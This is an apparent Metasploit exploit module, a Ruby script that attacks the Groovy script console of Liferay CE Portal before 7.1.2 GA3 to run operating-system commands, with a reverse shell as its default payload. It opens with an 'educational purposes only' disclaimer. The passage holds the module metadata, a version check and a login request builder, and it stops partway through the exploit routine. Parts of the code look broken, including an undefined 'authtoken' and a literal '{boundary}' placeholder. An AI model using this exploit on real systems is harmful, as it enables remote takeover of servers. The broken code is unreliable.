This exploit / vulnerability, Liferay CE Portal < 7.1.2 GA3 remote command execution (Metasploit), is for educational purposes only; if you use it, you do so at your own risk!
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
# Reliability ranking advertised to the framework for this module.
Rank = ExcellentRanking
# Supplies send_request_cgi and the ssl/rhost/rport accessors used below.
include Msf::Exploit::Remote::HttpClient
# Registers the module metadata and its user-facing options.
#
# The target is driven over HTTP (see the HttpClient mixin) and commands are
# run through the portal's Groovy script console, so only a cmd-type payload
# is compatible; administrator credentials are mandatory options.
#
# @param info [Hash] metadata merged by update_info, as for every module
def initialize(info = {})
  # Payload constraints pulled out so the metadata call stays readable.
  payload_info = {
    'DisableNops' => true,
    'Compat' => {
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'reverse perl ruby python'
    }
  }

  super(update_info(info,
    'Name' => 'Liferay CE Portal Tomcat < 7.1.2 ga3 - Groovy-Console Remote Command Execution',
    'Description' => %q{
This module uses the Liferay CE Portal Groovy script console to execute
OS commands. The Groovy script can execute commands on the system via a [command].execute() call.
Valid credentials for an application administrator user account are required
This module has been tested successfully with Liferay CE Portal Tomcat 7.1.2 ga3 on Debian 4.9.18-1kali1 system.
},
    'Author' => [
      'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, PoC & Msf Module
    ],
    'License' => MSF_LICENSE,
    'References' => [
      [ 'URL', 'https://pentest.com.tr/exploits/Liferay-CE-Portal-Tomcat-7-1-2-ga3-Groovy-Console-Remote-Command-Execution-Metasploit.html' ]
    ],
    'Privileged' => false,
    'Platform' => [ 'unix' ],
    'Payload' => payload_info,
    'Arch' => ARCH_CMD,
    'Targets' => [
      [ 'Liferay CE Portal Tomcat < 7.1.2 ga3', {} ]
    ],
    'DisclosureDate' => 'March 08, 2019',
    'DefaultTarget' => 0,
    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }
  ))

  # PATH is the portal's base URI; the credentials are required because the
  # Groovy console sits behind an administrator login.
  module_options = [
    Opt::RPORT(8080),
    OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
    OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),
    OptString.new('PATH', [ true, 'The URI path of the portal', '/' ])
  ]
  register_options(module_options, self.class)
end
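##
# Version and Vulnerability Check
#
# Requests the guest home page and inspects the 'Liferay-Portal' response
# header. Returns CheckCode::Unknown when the target does not answer,
# CheckCode::Vulnerable when a 200 response advertises a 6.x or 7.x portal,
# and CheckCode::Safe otherwise.
#
# NOTE(review): the header only exposes the version string, so a fixed
# 7.1.2 GA3+ install is still reported as Vulnerable here; treat the result
# as version evidence rather than proof that the Groovy console is reachable.
##
def check
  res = send_request_cgi({
    'method' => 'GET',
    # normalize_uri joins the segments so PATH works with or without a
    # trailing slash (the old string concat required one).
    'uri' => normalize_uri(datastore['PATH'], 'web', 'guest', 'home')
  })
  # A nil response (timeout, refused connection) previously raised
  # NoMethodError on res.headers before the nil guard was ever reached.
  return Exploit::CheckCode::Unknown unless res

  version = res.headers['Liferay-Portal']
  print_status("Target: #{version}")

  # The original `and ... or` chain let the 6.x match bypass the status
  # check; group both version branches under the 200 check, and escape the
  # dot so it matches a literal "7." / "6." rather than any character.
  if res.code == 200 && version.to_s.match?(/Portal [67]\./)
    Exploit::CheckCode::Vulnerable
  else
    Exploit::CheckCode::Safe
  end
end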
##
# Returns the SSL, Host and Port as a string
#
# Builds "http://host:port" or "https://host:port" from the HttpClient
# ssl/rhost/rport accessors.
##
def peer
  scheme = ssl ? 'https' : 'http'
  "#{scheme}://#{rhost}:#{rport}"
end
def exploit
##
# Login and cookie information gathering
##
print_status('Attempting to login with specified user...')
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_formDate\"\r\n\r\n"
data << ""
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_saveLastPath\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_redirect\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_login\"\r\n\r\n"
data << "#{datastore['USERNAME']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_password\"\r\n\r\n"
data << "#{datastore['PASSWORD']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_checkboxNames\"\r\n\r\nrememberMe\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
data << "#{authtoken}"
data << "\r\n-----------------------------{boundary}--\r\n"